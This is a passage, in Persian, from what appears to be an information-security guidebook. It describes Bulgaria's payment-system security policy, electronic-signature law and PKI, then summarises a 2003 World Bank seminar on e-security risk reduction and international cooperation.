‫ﺍﻃﻼﻋﺎﺕ ﺩﺍﺧﻠﻲ‪ ،‬ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ‬
‫)ﻋﻠﻲﺍﻟﺨﺼﻮﺹ ﺩﺍﺩﻩﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ( ‪ -‬ﺭﺍ ﻣﻌﺮﻓـﻲ‬
‫ﻧﻤﻮﺩ‪.‬‬
‫ﺍﺯ ﺑﻌﺪ ﺳﺎﺯﻣﺎﻧﻲ‪ ،‬ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﻳـﻚ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﻣﺴﺌﻮﻝ ﺗﺤﻠﻴﻞ ﻭ ﺍﺭﺍﺋﻪ ﺭﺍﻫﻜﺎﺭﻫﺎ ﺑﻮﺩ‪ .‬ﺗـﺪﻭﻳﻦ ﺧـﻂﻣـﺸﻲﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺎﺯﻣﻨﺪ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪﻫـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﻭ‬
‫ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺭﻭﺯ‬
‫ﻭ ﻓﻬﺮﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﺎﺹ ﻭ ﭘﻴﭽﻴـﺪﻩ ﺍﺳـﺖ‪ .‬ﺑﻠﻐﺎﺭﻫـﺎ ﺍﻳﻤﻨـﻲ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺭﺍ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻣﻲﺩﺍﻧﻨﺪ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﻧﻈﺎﺭﺗﻲ‬
‫ﻭ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ‪ -‬ﻳﻜﻲ ﺍﺯ ﺍﺟـﺰﺍﻱ ﻣﻬـﻢ‬
‫ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ‪ -‬ﻧﻴﺰ ﻣﻲﺷـﻮﺩ‪ .‬ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﺎﺭﻩ‬
‫ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ )ﻣﺸﺘﻤﻞ‬
‫ﺑﺮ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻓﻨﻲ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻛﺎﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ( ﻫﻤﭽﻨـﺎﻥ ﻛـﺎﺭ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺷﺎﻣﻞ ﻗﺎﻧﻮﻥ ﺳﻨﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﻨﻈﻴﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ‬
‫ﻗﺎﻧﻮﻧﻲ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﭘﻴـﺸﺮﻓﺘﺔ ﺍﻣـﻀﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎﻧﻜﻬﺎ ﻣﺎﻳﻞ ﺑﻪ ﺍﻳﺠﺎﺩ ‪PKI‬‬
‫ﺹ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ‪،‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺑﺎﻧﻜﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺧﺎ ﹺ‬
‫ﻧﻘﺶ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﻱ ﺩﺭﻭﻧﻲ ﻭ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﺎﺯﮔﺎﺭ ﺑـﻴﻦ‬
‫ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧﻴـﺰ‬
‫ﻳﻚ ﻣﻼﺣﻈﺔ ﺧﺎﺹ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﻋﻼﻭﻩ ﺑﺮ ﺗﻌﺮﻳﻒ ﻧﻴﺎﺯﻫﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﻧﻴﺰ ﺗﻌﺮﻳﻒ ﻛﻨﺪ‪ .‬ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﻮﻣﻲ ﺍﺯ ﻣﻔﻬﻮﻡ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻋﻮﺍﻣﻞ ﻛﻠﻴﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﻩ‪ ،‬ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‪ ،‬ﻭ ﻗﻴﻤـﺖ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﺩﺭ ﻳﻚ ﻣﻨﻄﻘﺔ ﺣﻔﺎﻇﺖﺷـﺪﻩ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺣﻔﺎﻇﺖ ﺷـﺎﻣﻞ ﻭﺟـﻮﺩ ‪ gateway‬ﺧـﺎﺹ ﺑـﺮﺍﻱ ﻫـﺮ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳـﺖ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑـﺴﺘﺔ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ BANKNET‬ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﻧﻜﻬﺎ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻋﻠﻴﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣﻴـﺴﺮ‬
‫ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺩﺭ ﭘﺸﺖ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﻴﻦ ﺑـﺎﻧﻜﻲ ﺗـﺄﻣﻴﻦ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳـﺎ ﻫـﺮ ﺟـﺎﻱ ﺩﻳﮕـﺮ‪ ،‬ﺑﺎﻧﻜﻬـﺎﻱ ﻣﺮﻛـﺰﻱ ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﺎﺭﭼﻮﺑﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺗـﺼﻮﻳﺐ‬
‫ﻻ ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧـﺖ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﭼﺎﺭﭼﻮﺑﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻭ ﻗﻮﺍﻧﻴﻦ ﺣﺎﻛﻢ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺍﻳـﻦ‬
‫ﻃﺮﻳﻖ‪ ،‬ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺍﺯ ﺟﻤﻠﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻣﺮﻛﺰﻱ ﻭ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ‬
‫ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪ .‬ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪ ﻛـﻪ ﭘـﻮﻝ ﺭﺍﻳـﺞ‬
‫ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺳﺨﺖ ﺗﺮﺍﺯﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻣﺸﻜﻠﺴﺎﺯ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺁﻧﻬﺎ‬
‫‪٢٢١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺭ ﺧﺼﻮﺹ ﻧﻘﺶ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﭘﺮﺩﺍﺧﺖ ﭘﺮﺳﺶ ﺩﺍﺭﻧﺪ ﻭ ﻣﻲﺧﻮﺍﻫﻨـﺪ ﺑﺪﺍﻧﻨـﺪ ﻛـﻪ ﺁﻳـﺎ ﺑﺎﻳـﺪ ﺑـﺮ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻧﻈﺎﺭﺕ ﺳﺨﺘﮕﻴﺮﺍﻧﻪﺗﺮﻱ ﺍﻋﻤﺎﻝ ﻛـﺮﺩ ﻳـﺎ ﻧـﻪ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﺑﺮﺯﻳﻞ ﻭ ﺁﻓﺮﻳﻘﺎﻱ ﺟﻨﻮﺑﻲ ﺭﻭﺷﻬﺎﻱ ﺳﺨﺖﮔﻴﺮﺍﻧﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﺘﻘﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﻛﺎﺭﺁ ﻭ ﺭﻗﺎﺑﺘﻲ ﻃﺮﺍﺣـﻲ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺷـﺮﺍﻳﻂ‪،‬‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﻋﺎﻣـﻞ ﺍﻧﺤـﺼﺎﺭ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ ﻭ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨـﺪ ‪ ،‬ﻭ‬
‫ﻟﺬﺍ ﻣﺴﺘﻨﺪﺍﺕ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺷـﺎﻣﻞ ﺍﺭﺯﻳﺎﺑﻴﻬـﺎﻱ ﺩﻗﻴﻘـﻲ ﺍﺯ ﻧﺤـﻮﺓ‬
‫ﺗﺄﺛﻴﺮ ﻓﻨﺎﻭﺭﻳﻬﺎ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺮﺩﻩﻓﺮﻭﺷﻲ ﻧﻴﺰ ﺑﺸﻮﻧﺪ‪.‬‬
‫ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬
‫ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۳‬‬
‫‪٢٣٥‬‬
‫ﺍﻳﻤﻨﻲ ﻭ ﺳﻼﻣﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺍﻳﻦ ﻧﺸﺴﺖ ﺑﺎ ﻋﻨﺎﻳﺖ ﺑﻪ ﺭﺷـﺪ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻣﺨـﺎﻃﺮﺍﺕ‪ ،‬ﺍﻫﻤﻴـﺖ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺩﺭ ﻗﺎﻟـﺐ ﺟﻬـﺎﻧﻲ‬
‫ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ‪ .‬ﺩﺭﺻﻮﺭﺕ ﺑﻲﻧﻈﻤﻲ ﺩﺭ ﺭﻭﺍﻟﻬﺎﻱ ﮔﺰﺍﺭﺵﺩﻫﻲ‪،‬‬
‫ﻫﻤﺔ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺧﻄـﺮﺳـﺎﺯﺗﺮ ﺷـﻮﻧﺪ‪ .‬ﺑﻴـﺸﺘﺮ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺩﻗﻴﻖ ﻫﺴﺘﻨﺪ‪ .‬ﻋـﻼﻭﻩ‬
‫ﺑﺮ ﺍﻳﻦ‪ ،‬ﻛﺮﻣﻬﺎ‪ ،‬ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻧـﻮﺍﻉ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﺮﺍﻱ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﻧﻴﺎ ﻋﻮﺍﺭﺽ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ‪.‬‬
‫‪ ۲۳۵‬ﺍﻳﻦ ﺟﻠﺴﻪ ﺑﺎ ﺣﻀـﻮﺭ ﺍﻋﻀﺎﻱ ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔـﺰﺍﺭ‬
‫ﺷــﺪ‪ .‬ﺍﻋـ ـﻀﺎﻱ ﺣﺎﺿــﺮ ﺩﺭ ﺟﻠــﺴـﻪ ﻋﺒــﺎﺭﺕ ﺑﻮﺩﻧــﺪ ﺍﺯ‪Thomas :‬‬
‫‪ ،Tom Kellerman ،Glaessner‬ﻭ ‪،Valerie McNevin‬‬
‫ﺑﻌﻼﻭﺓ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺭ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭ ﺟﻬﺎﻧﻲ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺑﺮﺯﻳـﻞ‪،‬‬
‫ﺷﻴﻠﻲ‪ ،‬ﻛﻠﻤﺒﻴﺎ‪ ،‬ﻣﻜﺰﻳﻚ‪ ،‬ﻋﺮﺑﺴﺘﺎﻥ ﺳﻌﻮﺩﻱ‪ ،‬ﺍﻭﻛـﺮﺍﻳﻦ‪ ،‬ﺍﺳـﺘﺮﺍﻟﻴﺎ‪ ،‬ﭼـﻴﻦ‬
‫)ﭘﻜﻦ(‪ ،‬ﭼﻴﻦ )ﻫﻨﮓﻛﻨـﮓ(‪ ،‬ﻣـﺎﻟﺰﻱ‪ ،‬ﻓﻴﻠﻴﭙـﻴﻦ‪ ،‬ﺳـﻨﮕﺎﭘﻮﺭ‪ ،‬ﻭ ﺳـﺮﻳﻼﻧﻜﺎ‪.‬‬
‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺻﻠﻲ ﺍﻳﻦ ﻧﺸﺴﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺩﺭﺱ ﺯﻳـﺮ‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E‬‬‫‪Security/E-Finance&Presentations‬‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪:‬‬
‫ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﻧﺮﻡ ﻭ ﺳﺨﺖ‬
‫ﻳﻚ ﺗﻌﺮﻳﻒ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ‬
‫ﻲ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫"ﻫﺮ ﺍﺑﺰﺍﺭ‪ ،‬ﻓﻦ‪ ،‬ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﺩﺍﺭﺍﻳﻴﻬﺎﻱ ﺍﻃﻼﻋﺎﺗ ﹺ‬
‫ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣـﺎﻧﮕﻲ‪ ،‬ﺟﺎﻣﻌﻴـﺖ ﻳـﺎ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﺍﺳﺖ‪ ،‬ﻣﺤﺎﻓﻈﺖ ﻛﻨﺪ"‪ .‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ‬
‫ﺩﻭ ﺯﻳﺮﺳﺎﺧﺖ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ‪ :‬ﺯﻳﺮﺑﻨﺎﻱ ﻧﺮﻡ ﺷﺎﻣﻞ ﺳﻴﺎﺳﺘﻬﺎ‪،‬‬
‫ﺭﻭﺍﻟﻬــﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬــﺎ؛ ﻭ ﺯﻳﺮﺑﻨــﺎﻱ ﺳــﺨﺖ ﺷــﺎﻣﻞ‬
‫ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ‪ .‬ﺍﻓﺰﺍﻳﺶ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ‬
‫ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﺗﻬﺪﻳـﺪﻫـﺎ ﻭ ﺍﺣﻴﺎﻧـﹰﺎ ﮔـﺴﺘﺮﺩﻩﺗـﺮ ﺷـﺪﻥ‬
‫ﺗﺄﺛﻴﺮﺍﺕ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ‬
‫ﭘﻴﺶ ﺍﺯ ﺍﻳﻦ ﺩﻳﺪﻳﻢ ﺑﻪ ﻋﻠﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲﺷـﺪﻩ ﻭ ﮔـﺎﻩ‬
‫ﺗﺮﻭﺭﻳﺴﺘﻲ‪ ،‬ﺑﺮ ﺳﺮﻋﺖ ﻭ ﺷﺪﺕ ﺣﻤﻼﺕ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻫﻤـﺔ‬
‫ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺩﺳﺖ ﺑﻪ ﺩﺳﺖ ﻫﻢ ﻣﻲﺩﻫﻨﺪ ﺗﺎ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ‬
‫ﺑﻪ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﺍﻳـﺪﻩﺁﻝ ﻭ‬
‫ﺍﺛﺮﺑﺨﺶ ﺗﺒﺪﻳﻞ ﻛﻨﻨﺪ‪.‬‬
‫ﮔﺴﺘﺮﺵ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﺑـﺎ‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻋﻈﻴﻤﻲ ﺭﻭﺑﺮﻭ ﺍﺳﺖ‪:‬‬
‫ﻻ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺠـﺎﻱ‬
‫ﺍﻭﻝ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻨﺸﻲ ﺑﻮﺩﻥ‪ ،‬ﻭﺍﻛﻨﺸﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺎﻳﺪ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﺍﺩ ﺗـﺎ‬
‫ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻓﻌﺎﻻﻧﻪ ﻭ ﻣﺪﺍﻭﻡ ﺑﺎ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻓﻌﻠﻲ ﻭ ﺁﻳﻨـﺪﻩ ﺑـﻪ‬
‫ﻣﺒﺎﺭﺯﻩ ﭘﺮﺩﺍﺧﺖ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺯ ﺍﻫﻤﻴـﺖ ﻭﻳـﮋﻩﺍﻱ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺑﺨﺼﻮﺹ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻧـﺎﻇﺮﺍﻥ؛‬
‫ﺍﻣﺎ ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﻛﺸﻮﺭ ﻭﺍﺣﺪ ﻫﻢ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺍﺧﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﺮﻱ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎﻱ ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺑﺮ ﺿﺮﻭﺭﺕ ﺁﻣﻮﺯﺷﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ‬
‫ﻭ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺯﻣﻴﻨﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ‪ ،‬ﻭ ﻧﻬﺎﻳﺘـﹰﺎ‬
